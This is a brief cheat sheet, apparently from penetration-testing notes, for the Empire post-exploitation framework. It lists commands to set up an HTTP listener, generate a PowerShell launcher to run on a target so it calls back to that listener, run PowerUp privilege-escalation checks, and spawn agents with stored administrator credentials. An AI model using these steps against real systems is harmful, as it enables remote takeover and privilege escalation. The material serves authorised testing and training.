Empire

Empire is a PowerShell and Python post-exploitation agent.

Setup

Reset db

setup/reset.sh

Setup listener

listeners
uselistener http
info
set Host http://<ip>:<port>
set Port <port>
execute

launcher powershell

-> Paste output into file and execute on target

back
back
interact <agent-id>
searchmodule PowerUp
usemodule privesc/powerup/allcheck
execute

Store credentials

creds add <DefaultDomainName> administrator <pw>

usemodule management/spawnas
info
set Domain <DefaultDomainName>

set UserName administrator
set Password <pw>

Or use stored creds

set CredID <creds-id>

set Listener http
execute

back
back
agents

Last updated 3 years ago